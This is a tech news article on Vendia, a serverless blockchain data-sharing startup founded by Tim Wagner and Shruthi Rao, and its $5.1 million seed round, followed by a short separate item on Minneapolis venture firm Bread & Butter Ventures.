When the inventor of AWS Lambda, Tim Wagner, and the former head of blockchain at AWS, Shruthi Rao, co-found a startup, it’s probably worth paying attention. Vendia, as the new venture is called, combines the best of serverless and blockchain to help build a truly multi-cloud serverless platform for better data and code sharing.

Today, the Vendia team announced that it has raised a $5.1 million seed funding round, led by Neotribe’s Swaroop ‘Kittu’ Kolluri. Correlation Ventures, WestWave Capital, HWVP, Firebolt Ventures, Floodgate and FuturePerfect Ventures also participated in this oversubscribed round.


Seeing Wagner at the helm of a blockchain-centric startup isn’t exactly a surprise. After building Lambda at AWS, he spent some time as VP of engineering at Coinbase, where he left about a year ago to build Vendia.

“One day, Coinbase approached me and said, ‘hey, maybe we could do for the financial system what you’ve been doing over there for the cloud system,’ ” he told me. “And so I got interested in that. We had some conversations. I ended up going to Coinbase and spent a little over a year there as the VP of Engineering, helping them to set the stage for some of that platform work and tripling the size of the team.” He noted that Coinbase may be one of the few companies where distributed ledgers are actually mission-critical to their business, yet even Coinbase had a hard time scaling its Ethereum fleet, for example, and there was no cloud-based service available to help it do so.

Tim Wagner, Vendia co-founder and CEO (Image Credits: Vendia)

“The thing that came to me as I was working there was why don’t we bring these two things together? Nobody’s thinking about how would you build a distributed ledger or blockchain as if it were a cloud service, with all the things that we’ve learned over the course of the last 10 years building out the public cloud and learning how to do it at scale,” he said.

Wagner then joined forces with Rao, who spent a lot of time in her role at AWS talking to blockchain customers. One thing she noticed was that while it makes a lot of sense to use blockchain to establish trust in a public setting, that’s really not an issue for enterprise.

“After the 500th customer, it started to make sense,” she said. “These customers had made quite a bit of investment in IoT and edge devices. And they were gathering massive amounts of data. And they also made investments on the other side, with AI and ML and analytics. And they said, ‘well, there’s a lot of data and I want to push all of this data through these intelligent systems. And I need a mechanism to get this data.’ ” But the majority of that data often comes from third-party services. At the same time, most blockchain proofs of concept weren’t moving into any real production usage because the process was often far too complex, especially for enterprises that wanted to connect their systems to those of their partners.

Shruthi Rao, Vendia co-founder and CBO (Image Credits: Vendia)

“We are asking these partners to spin up Kubernetes clusters and install blockchain nodes. Why is that? That’s because for blockchain to bring trust into a system to ensure trust, you have to own your own data. And to own your own data, you need your own node. So we’re solving fundamentally the wrong problem,” she explained.

The first product Vendia is bringing to market is Vendia Share, a way for businesses to share data with partners (and across clouds) in real time, all without giving up control over that data. As Wagner noted, businesses often want to share large data sets but they also want to ensure they can control who has access to that data. For those users, Vendia is essentially a virtual data lake with provenance tracking and tamper-proofing built-in.

The company, which mostly raised this round after the coronavirus pandemic took hold in the U.S., is already working with a couple of design partners in multiple industries to test out its ideas, and plans to use the new funding to expand its engineering team to build out its tools.

“At Neotribe Ventures, we invest in breakthrough technologies that stretch the imagination and partner with companies that have category creation potential built upon a deep-tech platform,” said Neotribe founder and managing director Kolluri. “When we heard the Vendia story, it was a no-brainer for us. The size of the market for multi-party, multi-cloud data and code aggregation is enormous and only grows larger as companies capture every last bit of data. Vendia’s serverless-based technology offers benefits such as ease of experimentation, no operational heavy lifting and a pay-as-you-go pricing model, making it both very consumable and highly disruptive. Given both Tim and Shruthi’s backgrounds, we know we’ve found an ideal ‘Founder fit’ to solve this problem! We are very excited to be the lead investors and be a part of their journey.”

Minneapolis-based VC shop Bread & Butter focuses on its own backyard

While many investors say sheltering in place has broadened their appetite for funding companies located outside major hubs, one firm is doubling down on backing startups in America’s heartland.

Launched in 2016 by Brett Brohl, The Syndicate Fund rebranded to Bread & Butter Ventures earlier this month (a reference to one of Minnesota’s many nicknames). Along with the rebrand, longtime Google executive and Revolution partner Mary Grove joined the team as a general partner and Stephanie Rich came aboard as head of platform.

The growth of the Twin Cities’ startup ecosystem is precisely why The Syndicate Fund rebranded. The firm, which has $10 million in assets under management, will invest in three of Minneapolis’ biggest strengths: agriculture and food, health care and enterprise software.

Agtech interest spans the entire spectrum from farming to restaurants and grocery stores. The firm is also interested in the “messy middle” of supply chain and logistics around food, said Brohl, and it is interested in a mix of software, hardware and biosciences. Within health care, the firm evaluates solutions focused on prevention versus treatment, female health startups working on maternal health and fertility, and software focused on the aging population and millennials.

It’s also looking at enterprise software that can serve large businesses and scale efficiently.